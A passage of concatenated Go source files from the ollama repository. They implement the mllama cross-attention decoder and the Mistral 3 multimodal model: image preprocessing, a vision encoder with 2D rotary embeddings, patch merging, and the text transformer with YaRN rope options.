		key = key.Reshape(ctx, headDim, opts.numKVHeads, numVisionTokens*numTiles)
		key = ca.KeyNorm.Forward(ctx, key, opts.eps)

		value = ca.Value.Forward(ctx, crossAttentionStates)
		value = value.Reshape(ctx, headDim, opts.numKVHeads, numVisionTokens*numTiles)

		cache.Put(ctx, key, value)
	}

	key, value, _ = cache.Get(ctx)

	scaleFactor := 1.0 / math.Sqrt(float64(headDim))

	// Manual attention (rather than nn.Attention): no causal mask applies and
	// K/V come from the encoder cache.
	query = query.Permute(ctx, 0, 2, 1, 3)
	key = key.Permute(ctx, 0, 2, 1, 3)
	value = value.Permute(ctx, 1, 2, 0, 3).Contiguous(ctx)

	kq := key.MulmatFullPrec(ctx, query)

	kq = kq.Scale(ctx, scaleFactor)
	kq = kq.Softmax(ctx)

	kqv := value.Mulmat(ctx, kq)
	attention := kqv.Permute(ctx, 0, 2, 1, 3).Contiguous(ctx)
	attention = attention.Reshape(ctx, opts.hiddenSize, batchSize)

	return ca.Output.Forward(ctx, attention)
}

// TextCrossAttentionDecoderLayer wraps cross-attention and the MLP with
// tanh-gated residual connections.
type TextCrossAttentionDecoderLayer struct {
	AttentionNorm  *nn.RMSNorm `gguf:"attn_norm"`
	CrossAttention *TextCrossAttention
	AttentionGate  ml.Tensor `gguf:"cross_attn_attn_gate"`

	MLPNorm *nn.RMSNorm `gguf:"ffn_norm"`
	MLP     *TextMLP
	MLPGate ml.Tensor `gguf:"cross_attn_mlp_gate"`
}

func (d *TextCrossAttentionDecoderLayer) Forward(ctx ml.Context, hiddenState, _, _, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor {
	residual := hiddenState

	hiddenState = d.AttentionNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = d.CrossAttention.Forward(ctx, hiddenState, crossAttentionStates, cache, opts)
	hiddenState = hiddenState.Mul(ctx, d.AttentionGate.Tanh(ctx))
	hiddenState = hiddenState.Add(ctx, residual)
	residual = hiddenState

	hiddenState = d.MLPNorm.Forward(ctx, hiddenState, opts.eps)
	hiddenState = d.MLP.Forward(ctx, hiddenState, opts)
	hiddenState = hiddenState.Mul(ctx, d.MLPGate.Tanh(ctx))
	return hiddenState.Add(ctx, residual)
}

// TextDecoderLayer is implemented by both self-attention and cross-attention
// decoder layers so TextDecoder can iterate over a mixed stack.
type TextDecoderLayer interface {
	Forward(ctx ml.Context, hiddenState, positionIDs, outputs, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor
}

// TextDecoder runs the mixed layer stack, routing each layer to the proper
// cache type and skipping cross-attention layers when no image has been seen.
type TextDecoder struct {
	Layers []TextDecoderLayer
}

func (d *TextDecoder) Forward(ctx ml.Context, hiddenState, positionIDs, outputs, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor {
	for i, layer := range d.Layers {
		layerType := selfAttentionLayer
		if slices.Contains(opts.crossAttentionLayers, int32(i)) {
			layerType = crossAttentionLayer
		}

		cache.SetLayer(i)
		cache.SetLayerType(layerType)

		// Cross-attention layers only run when vision states are present now or
		// were cached by an earlier step.
		if layerType == selfAttentionLayer || crossAttentionStates != nil || cache.UnderlyingCache().(*kvcache.EncoderCache).EncoderCached() {
			var lastLayerOutputs ml.Tensor
			if i == len(d.Layers)-1 {
				lastLayerOutputs = outputs
			}

			hiddenState = layer.Forward(ctx, hiddenState, positionIDs, lastLayerOutputs, crossAttentionStates, crossAttentionMask, cache, opts)
		}
	}

	return hiddenState
}

// TextModelOptions carries decoder hyperparameters from the GGUF metadata.
type TextModelOptions struct {
	hiddenSize, numHeads, numKVHeads int
	ropeDim                          int
	eps, ropeBase, ropeScale         float32

	crossAttentionLayers []int32
}

// applyRotaryPositionEmbeddings applies RoPE; note the scale is inverted
// (1/ropeScale) as expected by nn.RoPE.
func (o TextModelOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions, factors ml.Tensor) ml.Tensor {
	return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, rope.WithFactors(factors))
}

// TextModel is the mllama language decoder.
type TextModel struct {
	TokenEmbedding *nn.Embedding `gguf:"token_embd"`
	Transformer    *TextDecoder  `gguf:"blk"`
	OutputNorm     *nn.RMSNorm   `gguf:"output_norm"`
	Output         *nn.Linear    `gguf:"output"`

	*TextModelOptions
}

// Forward embeds input tokens, runs the decoder stack, and projects to logits.
func (m *TextModel) Forward(ctx ml.Context, inputIDs, positionIDs, outputs, crossAttentionStates, crossAttentionMask ml.Tensor, cache *kvcache.WrapperCache) ml.Tensor {
	hiddenState := m.TokenEmbedding.Forward(ctx, inputIDs)
	hiddenState = m.Transformer.Forward(ctx, hiddenState, positionIDs, outputs, crossAttentionStates, crossAttentionMask, cache, m.TextModelOptions)

	hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps)
	return m.Output.Forward(ctx, hiddenState)
}

// newTextModel builds the decoder, choosing the layer type per index from the
// cross_attention_layers metadata.
func newTextModel(c fs.Config) *TextModel {
	var decoderLayers []TextDecoderLayer
	for i := range c.Uint("block_count") {
		var textDecoderLayer TextDecoderLayer
		if slices.Contains(c.Ints("attention.cross_attention_layers"), int32(i)) {
			textDecoderLayer = &TextCrossAttentionDecoderLayer{}
		} else {
			textDecoderLayer = &TextSelfAttentionDecoderLayer{}
		}

		decoderLayers = append(decoderLayers, textDecoderLayer)
	}

	return &TextModel{
		Transformer: &TextDecoder{Layers: decoderLayers},
		TextModelOptions: &TextModelOptions{
			hiddenSize:           int(c.Uint("embedding_length")),
			numHeads:             int(c.Uint("attention.head_count")),
			numKVHeads:           int(c.Uint("attention.head_count_kv")),
			ropeDim:              int(c.Uint("rope.dimension_count")),
			eps:                  c.Float("attention.layer_norm_rms_epsilon"),
			ropeBase:             c.Float("rope.freq_base"),
			ropeScale:            c.Float("rope.scaling.factor", 1),
			crossAttentionLayers: c.Ints("attention.cross_attention_layers"),
		},
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/imageproc.go
model/models/mistral3/imageproc.go
package mistral3 import ( "image" _ "image/jpeg" _ "image/png" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) type ImageProcessor struct { imageSize int patchSize int numChannels int longestEdge int } func newImageProcessor(c fs.Config) ImageProcessor { return ImageProcessor{ imageSize: int(c.Uint("vision.image_size", 1540)), patchSize: int(c.Uint("vision.patch_size", 14)), numChannels: int(c.Uint("vision.num_channels", 3)), longestEdge: int(c.Uint("vision.longest_edge", 1540)), } } // ProcessImage prepares an image for the vision model by: // 1. Compositing transparent images // 2. Resizing to fit model constraints while preserving aspect ratio // 3. Normalizing pixel values // Returns normalized image data and the final size in pixels func (p *ImageProcessor) ProcessImage(img image.Image) ([]float32, image.Point, error) { img = imageproc.Composite(img) size := img.Bounds().Size() ratio := max(float64(size.Y)/float64(p.longestEdge), float64(size.X)/float64(p.longestEdge)) if ratio > 1.0 { size = image.Point{ int(math.Floor(float64(size.X) / ratio)), int(math.Floor(float64(size.Y) / ratio)), } } patchesX := (size.X-1)/p.patchSize + 1 patchesY := (size.Y-1)/p.patchSize + 1 size = image.Point{ patchesX * p.patchSize, patchesY * p.patchSize, } img = imageproc.Resize(img, size, imageproc.ResizeBilinear) data := imageproc.Normalize(img, imageproc.ClipDefaultMean, imageproc.ClipDefaultSTD, true, true) return data, size, nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/model.go
model/models/mistral3/model.go
package mistral3

import (
	"bytes"
	"image"
	"slices"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/model"
	"github.com/ollama/ollama/model/input"
)

// Model is the Mistral 3 multimodal model: a byte-pair-encoding tokenizer, a
// text transformer, and an optional vision tower whose outputs are projected
// into the text embedding space by MultiModalProjector.
type Model struct {
	model.Base
	model.BytePairEncoding

	*TextModel
	*VisionModel         `gguf:"v"`
	*MultiModalProjector `gguf:"mm"`

	ImageProcessor
}

// Implement MultimodalProcessor interface
var _ model.MultimodalProcessor = (*Model)(nil)

// Implement TextProcessor interface
var _ model.TextProcessor = (*Model)(nil)

// New constructs a Mistral 3 model from the given configuration, wiring up
// the tokenizer, text/vision submodels, image processor, and KV cache.
func New(c fs.Config) (model.Model, error) {
	m := &Model{
		BytePairEncoding: model.NewBytePairEncoding(
			&model.Vocabulary{
				Values: c.Strings("tokenizer.ggml.tokens"),
				Types:  c.Ints("tokenizer.ggml.token_type"),
				Merges: c.Strings("tokenizer.ggml.merges"),
				AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true),
				BOS:    []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))},
				AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false),
				EOS: append(
					[]int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))},
					c.Ints("tokenizer.ggml.eos_token_ids")...,
				),
			},
			// Pretokenizer split pattern (runtime regex; do not alter).
			`[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]*[\p{Ll}\p{Lm}\p{Lo}\p{M}]+|[^\r\n\p{L}\p{N}]?[\p{Lu}\p{Lt}\p{Lm}\p{Lo}\p{M}]+[\p{Ll}\p{Lm}\p{Lo}\p{M}]*|\p{N}| ?[^\s\p{L}\p{N}]+[\r\n/]*|\s*[\r\n]+|\s+(?!\S)|\s+`,
		),
		TextModel:           newTextModel(c),
		VisionModel:         newVisionModel(c),
		ImageProcessor:      newImageProcessor(c),
		MultiModalProjector: newMultiModalProjector(c),
	}
	m.Cache = kvcache.NewCausalCache(m.TextModel.Shift)
	return m, nil
}

// PatchMerger merges spatially adjacent vision patches into a single token
// via a learned linear layer.
type PatchMerger struct {
	MergingLayer *nn.Linear `gguf:"merging_layer"`
}

// Forward regroups the patch grid into spatialMergeSize x spatialMergeSize
// windows (via IM2Col) and projects each window with MergingLayer.
// size is the patch grid size in patches (not pixels).
func (pm *PatchMerger) Forward(ctx ml.Context, visionOutputs ml.Tensor, size image.Point, spatialMergeSize int) ml.Tensor {
	d := visionOutputs.Dim(0)
	// Lay the patch sequence back out as a (size.X, size.Y, d) grid.
	imageGrid := visionOutputs.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx).Reshape(ctx, size.X, size.Y, d)
	// kernel only supplies the window shape for IM2Col; its values are unused.
	kernel := ctx.Input().Empty(ml.DTypeF32, spatialMergeSize, spatialMergeSize, d)
	patches := kernel.IM2Col(ctx, imageGrid, spatialMergeSize, spatialMergeSize, 0, 0, 1, 1)
	// Flatten each window into one feature vector of d*merge*merge elements.
	reshaped := patches.Reshape(ctx, d*spatialMergeSize*spatialMergeSize, patches.Dim(1)*patches.Dim(2))
	return pm.MergingLayer.Forward(ctx, reshaped)
}

// MultiModalProjector maps vision-tower outputs into the text embedding
// space: RMSNorm -> patch merging -> two-layer MLP with GELU.
type MultiModalProjector struct {
	Norm        *nn.RMSNorm  `gguf:"norm"`
	Linear1     *nn.Linear   `gguf:"linear_1"`
	Linear2     *nn.Linear   `gguf:"linear_2"`
	PatchMerger *PatchMerger `gguf:"patch_merger"`

	spatialMergeSize int     // patches merged per side by PatchMerger
	eps              float32 // RMSNorm epsilon
	patchSize        int     // vision patch side length in pixels
}

// Forward projects vision outputs and returns the projected features along
// with the resulting grid size in merged patches. size is in pixels.
func (p *MultiModalProjector) Forward(ctx ml.Context, visionOutputs ml.Tensor, size image.Point) (ml.Tensor, image.Point) {
	visionOutputs = p.Norm.Forward(ctx, visionOutputs, p.eps)
	patchSizes := image.Point{size.X / p.patchSize, size.Y / p.patchSize}
	visionOutputs = p.PatchMerger.Forward(ctx, visionOutputs, patchSizes, p.spatialMergeSize)
	visionOutputs = p.Linear1.Forward(ctx, visionOutputs)
	visionOutputs = visionOutputs.GELU(ctx)
	return p.Linear2.Forward(ctx, visionOutputs), image.Point{patchSizes.X / p.spatialMergeSize, patchSizes.Y / p.spatialMergeSize}
}

// newMultiModalProjector reads projector hyperparameters from config with
// Mistral 3 defaults.
func newMultiModalProjector(c fs.Config) *MultiModalProjector {
	return &MultiModalProjector{
		spatialMergeSize: int(c.Uint("spatial_merge_size", 2)),
		eps:              c.Float("text_config.rms_norm_eps", 1e-5),
		patchSize:        int(c.Uint("vision.patch_size", 14)),
	}
}

// EncodeMultimodal decodes an image, runs it through the vision tower and
// projector, and splits the result into one Multimodal entry per grid row so
// row-break tokens can be interleaved during PostTokenize.
func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) {
	if len(m.VisionModel.Layers) == 0 {
		return nil, model.ErrNoVisionModel
	}
	// NOTE: "image" here deliberately shadows the image package below.
	image, _, err := image.Decode(bytes.NewReader(multimodalData))
	if err != nil {
		return nil, err
	}
	f32s, size, err := m.ImageProcessor.ProcessImage(image)
	if err != nil {
		return nil, err
	}
	pixelValues := ctx.Input().FromFloats(f32s, size.X, size.Y, m.ImageProcessor.numChannels)
	visionOutputs := m.VisionModel.Forward(ctx, pixelValues)
	// After projection, size is the merged-patch grid size (see
	// MultiModalProjector.Forward), no longer pixels.
	features, size := m.MultiModalProjector.Forward(ctx, visionOutputs, size)

	// split into patches to be sent to the text transformer
	rows := make([]input.Multimodal, size.Y)
	for i := range rows {
		// Each view is one grid row: size.X feature vectors of features.Dim(0).
		rows[i].Tensor = features.View(ctx, features.Stride(1)*size.X*i, features.Dim(0), features.Stride(1), size.X)
	}
	return rows, nil
}

// PostTokenize arranges Mistral 3's inputs for the forward pass
// In Mistral 3 and Pixtral, the input patches are arranged as follows:
// [IMG]...[IMG][IMG_BREAK][IMG]...[IMG][IMG_BREAK][IMG]...[IMG][IMG_END]
// Each sequence of [IMG]...[IMG] is a set of patches of vision embeddings
// that can be processed together.
func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) {
	var result []*input.Input
	for _, inp := range inputs {
		if len(inp.Multimodal) == 0 {
			// Plain text token: pass through unchanged.
			result = append(result, inp)
		} else {
			for i, row := range inp.Multimodal {
				// [IMG] — first token of the row carries the tensor; SameBatch
				// keeps the whole row in one batch.
				result = append(result, &input.Input{Token: 10, Multimodal: []input.Multimodal{{Tensor: row.Tensor}}, MultimodalHash: inp.MultimodalHash, SameBatch: row.Tensor.Dim(1)})
				// Placeholder [IMG] tokens for the remaining patches in the row.
				result = append(result, slices.Repeat([]*input.Input{{Token: 10}}, row.Tensor.Dim(1)-1)...)
				if i == len(inp.Multimodal)-1 {
					// [IMG_END]
					result = append(result, &input.Input{Token: 13})
				} else {
					// [IMG_BREAK]
					result = append(result, &input.Input{Token: 12})
				}
			}
		}
	}
	return result, nil
}

// Forward implements model.Model by delegating to the text transformer,
// supplying positions and the per-position rope scale tensor.
func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) {
	positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions))
	positionsScale := m.getScale(ctx, batch.Positions)
	return m.TextModel.Forward(ctx, batch.Inputs, positions, positionsScale, batch.Outputs, batch, m.Cache), nil
}

func init() {
	model.Register("mistral3", New)
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/model_vision.go
model/models/mistral3/model_vision.go
package mistral3

import (
	"math"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
)

// The vision tower always runs with a batch of one image.
var batchSize int = 1

// rotateHalf returns [-x2, x1] where x1 and x2 are the first and second
// halves of t along dim 0 — the standard rotation used by rotary embeddings.
func rotateHalf(ctx ml.Context, t ml.Tensor) ml.Tensor {
	x1 := t.Slice(ctx, 0, 0, t.Dim(0)/2, 1)
	x2 := t.Slice(ctx, 0, t.Dim(0)/2, t.Dim(0), 1).Contiguous(ctx)
	return x2.Scale(ctx, -1).Concat(ctx, x1, 0)
}

// applyRotaryPositionEmbeddings applies precomputed cos/sin rotary position
// embeddings: states*cos + rotateHalf(states)*sin.
func applyRotaryPositionEmbeddings(ctx ml.Context, states, cos, sin ml.Tensor) ml.Tensor {
	return states.Mul(ctx, cos).Add(ctx, rotateHalf(ctx, states).Mul(ctx, sin))
}

// VisionSelfAttention is a standard multi-head self-attention block with
// rotary position embeddings and no causal mask (full bidirectional
// attention over patches).
type VisionSelfAttention struct {
	Query  *nn.Linear `gguf:"attn_q"`
	Key    *nn.Linear `gguf:"attn_k"`
	Value  *nn.Linear `gguf:"attn_v"`
	Output *nn.Linear `gguf:"attn_output"`
}

// Forward projects hiddenStates to Q/K/V, applies 2D rotary embeddings to Q
// and K, attends, and projects back to the hidden size.
func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	query := sa.Query.Forward(ctx, hiddenStates)
	key := sa.Key.Forward(ctx, hiddenStates)
	value := sa.Value.Forward(ctx, hiddenStates)

	// Split heads: (headDim, numHeads, seq, batch).
	query = query.Reshape(ctx, opts.headDim, opts.numHeads, query.Dim(1), batchSize)
	key = key.Reshape(ctx, opts.headDim, opts.numHeads, key.Dim(1), batchSize)
	value = value.Reshape(ctx, opts.headDim, opts.numHeads, value.Dim(1), batchSize)

	query = applyRotaryPositionEmbeddings(ctx, query, cos, sin)
	key = applyRotaryPositionEmbeddings(ctx, key, cos, sin)

	// nil cache: the vision encoder is non-causal and stateless.
	attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(opts.headDim)), nil)
	attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), batchSize)
	return sa.Output.Forward(ctx, attention)
}

// VisionMLP is a SwiGLU feed-forward block: down(silu(gate(x)) * up(x)).
type VisionMLP struct {
	Gate *nn.Linear `gguf:"ffn_gate"`
	Up   *nn.Linear `gguf:"ffn_up"`
	Down *nn.Linear `gguf:"ffn_down"`
}

// Forward applies the gated MLP to hiddenStates.
func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, hiddenStates))
	return mlp.Down.Forward(ctx, hiddenStates)
}

// VisionEncoderLayer is one pre-norm transformer block of the vision tower.
type VisionEncoderLayer struct {
	AttentionNorm *nn.RMSNorm `gguf:"attn_norm"`
	SelfAttention *VisionSelfAttention

	FFNNorm *nn.RMSNorm `gguf:"ffn_norm"`
	MLP     *VisionMLP
}

// Forward runs norm->attention and norm->MLP, each with a residual add.
func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenStates, cos, sin ml.Tensor, opts *VisionModelOptions) ml.Tensor {
	residual := hiddenStates
	hiddenStates = e.AttentionNorm.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = e.SelfAttention.Forward(ctx, hiddenStates, cos, sin, opts)
	hiddenStates = hiddenStates.Add(ctx, residual)

	residual = hiddenStates
	hiddenStates = e.FFNNorm.Forward(ctx, hiddenStates, opts.eps)
	hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts)
	return hiddenStates.Add(ctx, residual)
}

// VisionModelOptions holds the vision tower hyperparameters read from config.
type VisionModelOptions struct {
	hiddenSize       int     // transformer embedding width
	numHeads         int     // attention heads
	headDim          int     // per-head dimension
	intermediateSize int     // MLP hidden width
	imageSize        int     // nominal input image size in pixels
	patchSize        int     // patch side length in pixels
	numChannels      int     // input channels
	eps              float32 // RMSNorm epsilon
	ropeBase         float32 // rotary embedding frequency base
}

// VisionModel is the Pixtral-style vision encoder: conv patch embedding,
// RMSNorm, and a stack of transformer layers with 2D rotary embeddings.
type VisionModel struct {
	PatchEmbedding *nn.Conv2D           `gguf:"patch_conv"`
	EncoderNorm    *nn.RMSNorm          `gguf:"encoder_norm"`
	Layers         []VisionEncoderLayer `gguf:"blk"`

	*VisionModelOptions
}

// positionalEmbedding builds the 2D rotary angle table for every possible
// patch position on a maxPatchesPerSide x maxPatchesPerSide grid, then
// gathers the rows selected by positionIDs. Even-indexed frequency bands
// encode the row (height) coordinate, odd-indexed bands the column (width).
func (m *VisionModel) positionalEmbedding(ctx ml.Context, positionIDs ml.Tensor) ml.Tensor {
	maxPatchesPerSide := m.imageSize / m.patchSize
	frequencies := m.headDim / 2
	frequenciesHeight := make([]float32, frequencies/2*maxPatchesPerSide)
	frequenciesWidth := make([]float32, frequencies/2*maxPatchesPerSide)
	for i := range frequencies {
		for j := range maxPatchesPerSide {
			// angle = position / base^(2i/headDim), as in standard RoPE.
			frequency := float32(j) / float32(math.Pow(float64(m.ropeBase), float64(i)*2/float64(m.headDim)))
			if i%2 == 0 {
				frequenciesHeight[i/2*maxPatchesPerSide+j] = frequency
			} else {
				frequenciesWidth[i/2*maxPatchesPerSide+j] = frequency
			}
		}
	}

	h := ctx.Input().FromFloats(frequenciesHeight, maxPatchesPerSide, frequencies/2)
	w := ctx.Input().FromFloats(frequenciesWidth, maxPatchesPerSide, frequencies/2)

	h = h.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx)
	w = w.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx)

	// Broadcast the height angles across columns and the width angles across
	// rows so every (row, col) grid cell gets a full angle vector.
	h = h.Repeat(ctx, 1, maxPatchesPerSide)
	h = h.Reshape(ctx, frequencies/2, maxPatchesPerSide, maxPatchesPerSide).Permute(ctx, 0, 2, 1, 3).Contiguous(ctx)

	w = w.Repeat(ctx, 2, maxPatchesPerSide)

	inverseFrequencies := h.Concat(ctx, w, 0).Reshape(ctx, frequencies, maxPatchesPerSide*maxPatchesPerSide)
	// Duplicate so the table covers both halves rotated by rotateHalf.
	inverseFrequencies = inverseFrequencies.Concat(ctx, inverseFrequencies, 0)
	return inverseFrequencies.Rows(ctx, positionIDs)
}

// Forward embeds pixelValues into patches and runs the transformer stack,
// returning one hidden vector per patch.
func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor) ml.Tensor {
	numPatchesW := pixelValues.Dim(0) / m.patchSize
	numPatchesH := pixelValues.Dim(1) / m.patchSize
	numPatches := numPatchesW * numPatchesH
	hiddenStates := m.PatchEmbedding.Forward(ctx, pixelValues, m.patchSize, m.patchSize, 0, 0, 1, 1)
	hiddenStates = hiddenStates.Reshape(ctx, numPatches, m.hiddenSize)
	hiddenStates = hiddenStates.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx)
	hiddenStates = m.EncoderNorm.Forward(ctx, hiddenStates, m.VisionModelOptions.eps)

	// Prepare position IDs for 2D rope
	positions := make([]int32, numPatches)
	for h := range numPatchesH {
		for w := range numPatchesW {
			idx := h*numPatchesW + w
			// Flattened index on the full imageSize/patchSize grid, matching
			// the table layout in positionalEmbedding.
			positions[idx] = int32(h*m.imageSize/m.patchSize + w)
		}
	}

	positionIDs := ctx.Input().FromInts(positions, len(positions))
	positionEmbedding := m.positionalEmbedding(ctx, positionIDs)
	cos, sin := positionEmbedding.Cos(ctx), positionEmbedding.Sin(ctx)
	// Insert a singleton head dimension so cos/sin broadcast over heads.
	cos = cos.Reshape(ctx, cos.Dim(0), 1, cos.Dim(1))
	sin = sin.Reshape(ctx, sin.Dim(0), 1, sin.Dim(1))

	for _, layer := range m.Layers {
		hiddenStates = layer.Forward(ctx, hiddenStates, cos, sin, m.VisionModelOptions)
	}

	return hiddenStates
}

// newVisionModel builds the vision tower from config with Mistral 3 defaults.
func newVisionModel(c fs.Config) *VisionModel {
	return &VisionModel{
		Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count")),
		VisionModelOptions: &VisionModelOptions{
			hiddenSize:       int(c.Uint("vision.embedding_length", 1024)),
			numHeads:         int(c.Uint("vision.attention.head_count", 16)),
			headDim:          int(c.Uint("vision.attention.key_length", 64)),
			intermediateSize: int(c.Uint("vision.feed_forward_length", 4096)),
			imageSize:        int(c.Uint("vision.image_size", 1540)),
			patchSize:        int(c.Uint("vision.patch_size", 14)),
			numChannels:      int(c.Uint("vision.num_channels", 3)),
			eps:              c.Float("vision.attention.layer_norm_epsilon", 1e-5),
			ropeBase:         c.Float("vision.rope.freq_base", 10000.0),
		},
	}
}
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mistral3/model_text.go
model/models/mistral3/model_text.go
package mistral3

import (
	"cmp"
	"math"

	"github.com/ollama/ollama/fs"
	"github.com/ollama/ollama/kvcache"
	"github.com/ollama/ollama/ml"
	"github.com/ollama/ollama/ml/nn"
	"github.com/ollama/ollama/ml/nn/rope"
	"github.com/ollama/ollama/model/input"
)

// TextOptions holds the text transformer hyperparameters, including the
// rope (rotary position embedding) scaling configuration.
type TextOptions struct {
	hiddenSize, numHeads, numKVHeads int
	headDim, ropeDim                 int
	eps, ropeBase, ropeScale         float32
	ropeOrigPosEmbeddings            int     // original context length for YaRN scaling (0 disables)
	ropeScalingBeta                  float32 // beta used by getScale's log-based position scaling
	ropeType                         string  // e.g. "yarn"; empty means plain rope
	ropeExtrapolation                float32
	ropeBetaFast                     float32
	ropeBetaSlow                     float32
	ropeMscale                       float32
	ropeMscaleAllDim                 float32
}

// applyRotaryPositionEmbeddings applies rope to states at the given
// positions. When ropeType is "yarn", YaRN-specific options (attention
// factor, original context length, extrapolation, beta fast/slow) are passed
// through to nn.RoPE.
func (o TextOptions) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor) ml.Tensor {
	var ropeOpts []func(*rope.Options)
	if o.ropeType == "yarn" {
		if o.ropeMscale != 0 && o.ropeMscaleAllDim != 0 {
			// YaRN attention temperature: 1 / (0.1*ln(scale) + 1).
			ropeOpts = append(ropeOpts, rope.WithAttentionFactor(1.0/float32(0.1*math.Log(float64(o.ropeScale))+1.0)))
		}
		ropeOpts = append(ropeOpts,
			rope.WithOriginalContextLength(o.ropeOrigPosEmbeddings),
			rope.WithExtrapolationFactor(o.ropeExtrapolation),
			rope.WithBetaFast(o.ropeBetaFast),
			rope.WithBetaSlow(o.ropeBetaSlow),
		)
	}
	return nn.RoPE(ctx, states, positions, o.ropeDim, o.ropeBase, 1./o.ropeScale, ropeOpts...)
}

// TextModel is the Mistral 3 text transformer.
type TextModel struct {
	TokenEmbedding *nn.Embedding `gguf:"token_embd"`
	Layers         []Layer       `gguf:"blk"`
	OutputNorm     *nn.RMSNorm   `gguf:"output_norm"`
	Output         *nn.Linear    `gguf:"output,alt:token_embd"`

	*TextOptions
}

// SelfAttention is grouped-query attention with rope applied to Q and K.
type SelfAttention struct {
	Query  *nn.Linear `gguf:"attn_q"`
	Key    *nn.Linear `gguf:"attn_k"`
	Value  *nn.Linear `gguf:"attn_v"`
	Output *nn.Linear `gguf:"attn_output"`
}

// Forward computes one attention pass. positionsScale is a per-position
// query scale (see getScale); it is only applied when YaRN original context
// length is configured.
func (sa *SelfAttention) Forward(ctx ml.Context, hiddenState, positionIDs, positionsScale ml.Tensor, cache kvcache.Cache, opts *TextOptions) ml.Tensor {
	batchSize := hiddenState.Dim(1)
	// Fall back to hiddenSize/numHeads when headDim is not set in config.
	headDim := cmp.Or(opts.headDim, opts.hiddenSize/opts.numHeads)

	q := sa.Query.Forward(ctx, hiddenState)
	q = q.Reshape(ctx, headDim, opts.numHeads, batchSize)
	q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs)

	k := sa.Key.Forward(ctx, hiddenState)
	k = k.Reshape(ctx, headDim, opts.numKVHeads, batchSize)
	k = opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs)

	v := sa.Value.Forward(ctx, hiddenState)
	v = v.Reshape(ctx, headDim, opts.numKVHeads, batchSize)

	if opts.ropeOrigPosEmbeddings > 0 {
		// Long-context query scaling; only active when YaRN is configured.
		q = q.Mul(ctx, positionsScale)
	}

	kqv := nn.Attention(ctx, q, k, v, 1.0/math.Sqrt(float64(headDim)), cache)
	kqv = kqv.Reshape(ctx, headDim*opts.numHeads, batchSize)
	return sa.Output.Forward(ctx, kqv)
}

// Shift re-ropes cached keys when the KV cache slides, as required by
// kvcache.NewCausalCache.
func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) {
	return m.applyRotaryPositionEmbeddings(ctx, key, shift), nil
}

// MLP is a SwiGLU feed-forward block: down(silu(gate(x)) * up(x)).
type MLP struct {
	Up   *nn.Linear `gguf:"ffn_up"`
	Down *nn.Linear `gguf:"ffn_down"`
	Gate *nn.Linear `gguf:"ffn_gate"`
}

// Forward applies the gated MLP to hiddenState.
func (mlp *MLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextOptions) ml.Tensor {
	hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState))
	return mlp.Down.Forward(ctx, hiddenState)
}

// Layer is one pre-norm transformer block: attention and MLP, each with a
// residual connection.
type Layer struct {
	AttentionNorm *nn.RMSNorm `gguf:"attn_norm"`
	SelfAttention *SelfAttention
